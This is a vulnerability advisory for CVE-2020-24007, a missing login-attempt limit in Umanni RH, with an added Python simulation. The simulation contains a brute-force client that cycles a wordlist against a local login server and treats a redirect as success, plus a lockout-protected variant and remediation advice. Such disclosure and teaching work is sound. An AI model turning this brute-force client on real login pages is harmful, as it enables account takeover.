CVE-2020-24007
Brute Force on Umanni RH
Description
Umanni RH does not limit the number of authentication attempts. An unauthenticated user may exploit this vulnerability to launch a brute-force authentication attack against the Login page.
Exploitation
To exploit this vulnerability, an attacker first uses the user-enumeration vulnerability in the Password Recovery function to obtain valid usernames, then performs an arbitrary number of authentication attempts against the Login page with different passwords for each account, eventually gaining access to the targeted account.
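The following is an added example, not Umanni RH code and not part of the original advisory. It simulates the weakness described above with a stand-in login endpoint that never limits authentication attempts, a brute-force client that treats the redirect issued on a valid password as the success signal (the PoC screenshots below label the successful attempt as a redirect), and a hardened variant of the same handler that locks the account after a fixed number of failures. The `/login` path, the `username`/`password` form fields, the credential store and the wordlist are all assumptions constructed for the simulation.

```python
"""Added example (not Umanni RH code): unlimited-attempt login endpoint,
brute-force client, and a lockout-protected variant of the same endpoint.
The /login path, form fields and credential table are assumptions."""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credential store for the simulation (not real Umanni RH data).
USERS = {"jdoe": "Summer2020"}
MAX_FAILURES = 5  # lockout threshold used only by the hardened variant


def make_handler(limit_attempts):
    """Build a login handler; limit_attempts=False reproduces the weakness,
    limit_attempts=True adds a per-user failure counter and lockout."""
    failures = {}

    class LoginHandler(BaseHTTPRequestHandler):
        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            form = urllib.parse.parse_qs(self.rfile.read(length).decode())
            user = form.get("username", [""])[0]
            pwd = form.get("password", [""])[0]
            if limit_attempts and failures.get(user, 0) >= MAX_FAILURES:
                self.send_response(429)  # locked: refuse even a correct password
                self.end_headers()
                return
            if USERS.get(user) == pwd:
                failures.pop(user, None)
                self.send_response(302)  # valid password: redirect to the home page
                self.send_header("Location", "/home")
                self.end_headers()
            else:
                failures[user] = failures.get(user, 0) + 1
                self.send_response(200)  # invalid password: login page re-rendered
                self.end_headers()
                self.wfile.write(b"Invalid username or password")

        def log_message(self, *args):  # keep the demo quiet
            pass

    return LoginHandler


def start_server(limit_attempts):
    """Start the simulated application on a random loopback port."""
    srv = HTTPServer(("127.0.0.1", 0), make_handler(limit_attempts))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def base_url(srv):
    return "http://127.0.0.1:%d" % srv.server_address[1]


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 302s: the redirect itself is the success signal."""
    def redirect_request(self, *args, **kwargs):
        return None


def brute_force(url, username, wordlist):
    """Try each password in order. Returns (password, attempts) on success,
    (None, attempts) when the list is exhausted or the server locks us out."""
    opener = urllib.request.build_opener(NoRedirect)
    for n, candidate in enumerate(wordlist, 1):
        data = urllib.parse.urlencode(
            {"username": username, "password": candidate}).encode()
        try:
            status = opener.open(url + "/login", data=data).status
        except urllib.error.HTTPError as e:
            status = e.code  # 302 (not followed) and 429 arrive here
        if status == 302:
            return candidate, n
        if status == 429:
            return None, n
    return None, len(wordlist)


if __name__ == "__main__":
    words = ["password", "123456", "Welcome1", "Summer2020", "letmein"]
    weak = start_server(limit_attempts=False)
    print("no limit :", brute_force(base_url(weak), "jdoe", words))
    weak.shutdown()
    hard = start_server(limit_attempts=True)
    print("lockout  :", brute_force(base_url(hard), "jdoe", words + ["x", "y"]))
    hard.shutdown()
```

Against the unlimited handler the client walks the wordlist until the 302 appears; against the hardened handler the sixth request is refused with 429 regardless of the password, which is the control the advisory says is missing. Account lockout alone lets an attacker lock out legitimate users, so in a real fix it is usually combined with per-IP rate limiting, exponential back-off or a CAPTCHA rather than used on its own.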
PoC
- Login Page
- Brute Force Login - Invalid Password
- Brute Force Login - Valid Password (Redirect)
- Brute Force Login - Valid Password (Redirect)
- Brute Force Login - Valid Password